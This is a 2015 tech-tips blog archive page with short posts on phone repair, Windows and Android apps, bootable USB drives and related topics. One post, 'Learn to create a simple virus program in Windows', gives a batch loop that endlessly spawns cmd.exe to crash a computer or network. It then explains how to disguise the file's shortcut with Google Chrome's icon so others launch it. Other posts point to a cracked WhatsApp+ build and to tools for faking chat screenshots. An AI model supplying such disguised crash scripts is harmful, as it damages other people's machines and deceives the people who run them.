Skip to main content

Posts

Showing posts from March, 2015

How to add pattern lock in Windows 7/8/8.1 ?

Are you bored of your default password system in windows and looking for a new locking method?  Pattern lock is the best thing to get rid of your old way of security system for your windows computer. Generally you have seen pattern lock in smart phones only, but now you can apply pattern lock in windows 7,8,8.1 PC too. Eusing Maze Lock : Eusing Maze Lock uses a new technique to help your computer. This technique is pattern based. You need first to set your own unlock pattern by connecting some of the nine dots together (There is a default unlock pattern has been pre-set). When you try to unlock your computer, you need to draw the same pattern exactly as you set. It is a cool software which lets you to lock your pc with your customize maze. Eusing Maze Lock is a powerful tool designed to help you lock your computer with a single click on the tray icon. While it provides a different locking system than the one bundled into Windows, Eusing Maze Lock places an icon

How to fix a water damaged phone ?

So you dropped your phone into the toilet, sink or pool. After a moment of panic, you need to save your mobile from becoming water damaged. Here are the steps how to recover a phone that's been dropped into a water. Before you do anything, remove the phone from water as soon as possible. What not to do : Do not turn it on if it was off or use it anyway. Do not press any buttons or keys. Do not shake or tilt the phone. Do not try to blow it. It could transfer the water into other internal parts Do not apply heat of anykind. Steps to save your phone : Turn it off if it isn't already and keep it in an upright position. Remove the protecting case, memory card and sim cards. Open up the back and remove the battery. (This is not possible in certain models of HTC and Asus phones). Take a cloth or paper towel and gently dab over it. You should stop spreading of water into holes and other parts. Bury it in a zipped bag of uncooked rice. This may seem odd to

Learn to create a simple virus program in Windows

Today i decided to teach my readers to create a simple virus using Windows shell script. Just using 3 lines of code you can crash the system. If you're are working in a distributed systems, you can crash the whole network. Steps to create a simple virus : 1. Open the notepad and type the following code.      :loop   start cmd.exe   goto loop                 2. Save the file as "virus.bat" at any location. Don't forget to set 'Save as type' as 'All Files'. 3. Now locate the file in Windows Explorer. Right click it and click 'Create Shortcut'. 4. We are going to change the appearance of this shortcut to look like another application. For example, I want to make this shortcut to look like Google Chrome. 5. Right click the shortcut and select properties. From the properties dialog box, click 'Change Icon' Button. 6. Click browse and locate the following path 'C:\Program Files\Google\Chrome\Application

Create fake conversations of Facebook, WhatsApp and prank your friends

You may come across some funny conversations like the above one in social sites. Many of them are not real. They are fake conversations created by third-party apps. One such app is Yazzy fake conversation creator. Yazzy is the ideal app to create fake conversations. With Yazzy, you can create fake, but faithful to the orginal, conversations. Each conversation is highly customizable : You can include status bar with wifi icon and custom battery level, notification bar, show or hide overflow, change whatsapp background, avatar etc. You can remove the watermark from the settings. It supports : Facebook status Tweet WhatsApp Android SMS iPhone SMS Facebook Messenger Google Search Hangout Google Translate WhatsApp group iPhone WhatsApp and more. Download from playstore :  here

How to change app name and icon in Android

Wouldn't be nice if we can change the default name and icon of an app to look like an another app. The default launcher in many phones doesn't have this facility. There are many launchers available in the android market having this facility. Of those, here I recommend the best launcher for many purposes. Nova Launcher : Download from play store:  here After installing nova launcher, open up the app drawer (click the menu button). Long press an app and drag and drop over the edit option. Now you can edit the app name into whatever you want. Click the icon to change it too. Finally click the tick mark at the top left.

Truth about hacking Clash of Clans and other server sided games

We get many questions daily asking us how to hack games such as Clash of Clans. This article explains why server side games generally can't be hacked. Overview : The server : This party is responsible for serving content. The client : This party requests content from the server and displays them to the user. In most cases, client is a web-browser. Each side's programming refers to a code which runs at the specific macine, the server's or the client's. Server side code : Server side code is the code that resides at web server. For every client's request, code is executed at server side and the result is send to the client in simple HTML format. Performance is lower than client side code due to server round trip. Client cannot see the business logic though it is stored on the server. Client side code : Client side code is reside at client's browser itself. It is executed at client-side only. User can easily see the code by Vie

Want to hack Gmail, Facebook accounts??

In the era of internet, emails and social networking have taken a prominent role in almost everyone's life especially when its come to the exchange of information and personal messages. So hacking a email/social networking account alone can reveal lot of personal informations about a person. Well this post is not about how to hack! But it is about making you aware of some of the password hacking spams and fake hacking tutorials. Many of the scam websites have managed to rank on top of Google for some of the most popular keywords about hacking. As a result, these websites attract a lot of people (who are in need of someone’s password) and promise them to give what they want! As most people do not have any knowledge about hacking, they often believe what is mentioned on these websites is true. Taking this factor as an added advantage, these websites (the so called hacking  services ) rip off money from the people and never keep up their promise. The big reason behin

Compile C, C++, Java programs in your phone

Run the code : How can it be more convenient and enjoyable if you can test code with one single tap? Run the code is the best way for you to write, compile, and execute code on your Android device. It's lightweight(55.75 KB). The compilation and execution of your code is completed in the cloud. It's ads-free. Also you can transfer code snippets directly from another app (e.g. a browser) that has a share button. Supported programming languages : C C++ C# Common Lisp D F# Go Haskell Java JavaScript Lua Objective-C Pascal Perl PHP Prolog Python 2 Python 3 Ruby Scala Scheme VB.NET Download it from playstore : here

WhatsApp+ v3.5 and Reborn v1.70

Recently, whatsapp+ users get banned and were forced to use orginal whatsapp. Some users are very much fond of the customizations available in whatsapp+. For those whatsapp+ lovers, here we present...Whatsapp+ reborn. WhatsApp Plus is updating its app very quickly and within the period of weeks the new update is available to users. Today, just few hours ago, the update of WhatsApp Plus v3.5 & Reborn v1.70 launched and it is available to download and install in your android smartphones. You can also get the Crack version of WhatsApp Plus v3.5 & Reborn v1.70 provided by OnHax. Key Features of Whats App Plus COLORFUL  : Basically it is a customizable WhatsApp where you can change lots of colors, sizes, and many other things. EXTRA UPLOAD LIMIT  : In addition you can increase upload media limit (stock limit is 16Mb) to send large music files or videos. SEND ORIGINAL PIC  : You can increase quality of pictures sent (by default resolution is decreased quite a lot) AD

How to create a Windows 7/8/10 bootable USB ?

In older days, CDs were used for the OS installation. After the arrival flash drives/pen drives, the trend changed. As they are basically re-writable, peoples prefer USB drives to CD/DVDs for the OS installation. If you have the setup files of Windows 7 or 8 and you just copy them into your USB drive, it will not boot. Let us see how you can make your pendrive really bootable. Requirements : An USB drive which should be shown as 'Removable Disk' in your Windows Explorer. (Some USB drives would show like a normal hard-disk partitions as 'Local Disk'. Such USB drives are not bootable) A valid ISO image of the Windows 7/8/10 setup. Windows 7 USB DVD Download Tool, which can be downloaded from here . (This tool can also be used for Windows 8/10. To create bootable USB : Open the Windows 7 USB DVD Download tool,  Pick the ISO file by clicking the browse button. Select your USB device, Then follow the guided instructions. Wait till 100% is completed.

Fastest way to download YouTube videos in mobile and PC

There exists many ways to download youtube videos. Windows applications, websites which usually ask for the link of the required youtube video. So, you have to copy and paste the link and do the others. An easy way to all these in a single tap is :- Go to the required youtube video. Go the address bar and lookup the address. Consider, for example the address is " www. youtube .com/watch?v=09R8_2nJtjg". Edit the address to the following : " www.ss youtube .com/watch?v=09R8_2nJtjg". Press "Enter". Now choose the download format and download your video. No Java required. Works on mobile too.

[Root] Enable onscreen navigation bar in android which is not enabled by default

To enable navigation bar : Your phone should have root access. Download the Build Prop editor from here  and install it in your phone. Open the app and grant root access. In the app, touch the '+' button Set the property name as 'qemu.hw.mainkeys'. Set the property value as 0. Reboot your phone. That's all